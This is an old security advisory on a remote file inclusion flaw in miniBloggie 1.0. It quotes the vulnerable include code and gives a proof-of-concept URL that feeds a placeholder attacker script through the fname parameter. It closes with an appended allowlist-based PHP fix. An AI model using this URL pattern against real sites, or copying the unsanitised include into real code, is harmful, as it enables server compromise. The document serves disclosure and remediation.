---------------------------------------------------------------------------------------
                    miniBloggie 1.0 fname Remote File Inclusion
---------------------------------------------------------------------------------------
Author   : Sh3ll
Date     : 2006/05/01
HomePage : http://www.sh3ll.ir
Contact  : sh3ll[at]sh3ll[dot]ir
---------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : miniBloggie
Version     : 1.0
Vendor      : http://www.mywebland.com
Class       : Remote File Inclusion
Risk        : High
Summary     : minibloggie, a mini blog script yet effective built using fast template
              for easy customisation. Using Mysql database system with edit, delete, ,
              support smiley & BBcode, administrator log in for easy website management.
---------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The Problem Is in cls_fast_template.php, Where the Variable $fname Is Used in an
include() Statement Without Being Declared.
---------------------------------cls_fast_template.php---------------------------------
....
<?php
else {
    fclose($fp);
    include $fname;   // $fname is used here without being declared
    return;
}
...
---------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]

Solution:
~~~~~~~~
Sanitize Variable $fname in cls_fast_template.php
----------------------------------------------------------------------------------------
Note:
~~~~
Vendor Contacted, But No Response. So Do a Dirty Patch.
----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
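
One way to apply the fix named under Solution, as an added example that is not miniBloggie's code or the advisory author's patch: the path handed to include is assigned by the script itself and checked against a fixed list first. TEMPLATE_DIR, ALLOWED_TEMPLATES, resolve_template() and the tpl parameter are hypothetical names, and the template list is constructed.

```php
<?php
// Added example, not miniBloggie's code. TEMPLATE_DIR, ALLOWED_TEMPLATES,
// resolve_template() and the "tpl" parameter are hypothetical names.

const TEMPLATE_DIR = __DIR__ . '/templates';
const ALLOWED_TEMPLATES = ['header.tpl', 'main.tpl', 'footer.tpl']; // constructed list

/**
 * Map a requested template name to a file under TEMPLATE_DIR.
 * Returns the resolved path, or null if the name must be rejected.
 */
function resolve_template($name): ?string
{
    // Only a plain string from the fixed list is accepted. This rejects URLs
    // (http://, ftp://, php://), absolute paths and ../ traversal in one step,
    // and also array-valued parameters such as ?tpl[]=x.
    if (!is_string($name) || !in_array($name, ALLOWED_TEMPLATES, true)) {
        return null;
    }

    // Defence in depth: resolve symlinks and confirm the file really sits
    // inside the template directory before it is handed to include.
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// $fname is always assigned here before use, so a request parameter can
// never stand in for an undeclared variable.
$requested = $_GET['tpl'] ?? 'main.tpl';   // hypothetical parameter
$fname = resolve_template($requested);
if ($fname === null) {
    http_response_code(404);
    exit('Template not found');
}
include $fname;
```

Independently of the code fix, `register_globals = Off` stops request parameters from populating undeclared variables, and `allow_url_include = Off` (the default since PHP 5.2) stops include from fetching remote URLs.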